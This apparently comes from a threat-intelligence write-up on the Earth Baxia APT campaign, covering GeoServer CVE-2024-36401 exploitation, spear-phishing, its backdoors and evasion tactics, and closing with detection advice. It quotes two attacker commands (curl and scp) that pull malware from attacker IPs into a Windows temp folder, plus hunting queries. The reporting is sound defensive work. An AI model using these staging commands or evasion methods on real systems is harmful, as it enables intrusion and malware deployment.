A China-linked advanced persistent threat group known as Earth Baxia has been conducting targeted attacks against government and private sector organizations across the Asia-Pacific region. Security researchers have identified two primary infection vectors: exploitation of the critical GeoServer vulnerability CVE-2024-36401 and sophisticated spear-phishing campaigns delivering custom malware payloads.
Technical Analysis of Attack Methodology
The Earth Baxia campaign demonstrates advanced operational capabilities through its multi-vector approach. The group leverages both technical exploits and social engineering tactics to compromise high-value targets. Forensic evidence suggests the attacks originate from Chinese infrastructure, with decoy documents containing Simplified Chinese text.
The threat actors utilize a novel backdoor called EAGLEDOOR with multi-protocol command-and-control capabilities. Modified Cobalt Strike beacons with altered signatures are deployed to evade standard detection mechanisms. Infrastructure analysis reveals connections to Chinese hosting providers and Alibaba Cloud services.
Initial Compromise Techniques
Earth Baxia employs two distinct methods for initial access. The first involves exploitation of CVE-2024-36401, a remote code execution vulnerability in OSGeo GeoServer GeoTools. Attackers execute commands via system utilities to download malware components:
curl --connect-timeout 3 -m 10 -o c:\\windows\\temp\\Edge.exe http://167[.]172[.]89[.]142/Edge.exe
scp -P 23 -o StrictHostKeyChecking=no t1sc@152[.]42[.]243[.]170:/tmp/bd/msedge.dll c:\\windows\\temp\\The second vector involves spear-phishing emails containing ZIP attachments with malicious MSC files. These campaigns use GrimResource techniques to fetch payloads from cloud platforms like AWS and Aliyun, implementing AppDomainManager injection for .NET payload execution.
Malware Payload Characteristics
The attack chain deploys several sophisticated components:
- SWORDLDR: A Cobalt Strike shellcode loader
- EAGLEDOOR: Multi-protocol backdoor supporting HTTP, DNS, TCP, and Telegram C2 channels
- Modified Cobalt Strike: Evasion-focused variants with altered MZ headers
The EAGLEDOOR backdoor demonstrates particularly advanced capabilities, including configurable communication protocols and cloud-based command infrastructure.
Defensive Evasion Tactics
The group employs multiple techniques to avoid detection:
- DLL side-loading through legitimate executables like Edge.exe
- Process hollowing into trusted .NET applications
- Cloud-based C2 infrastructure using AWS, Aliyun, and spoofed domains
- Custom watermarking of Cobalt Strike servers with identifier “666666”
Detection and Mitigation Strategies
Organizations should implement the following protective measures:
- Immediately patch GeoServer installations against CVE-2024-36401
- Monitor for suspicious TLS connections to known malicious domains
- Implement application allowlisting for system utilities like curl.exe
- Hunt for DLL side-loading patterns involving msedge.dll
Threat hunting queries can help identify compromised systems:
eventId:3 AND (src:"167.172.89.142" OR src:"152.42.243.170")
process_name:"curl.exe" AND cmd_line:"c:\\windows\\temp"Conclusion
The Earth Baxia campaign represents a significant threat to APAC organizations, combining technical exploitation with sophisticated social engineering. The group’s operational patterns and infrastructure links suggest state-sponsored origins. Organizations in targeted sectors should prioritize defensive measures and monitor for the identified indicators of compromise.
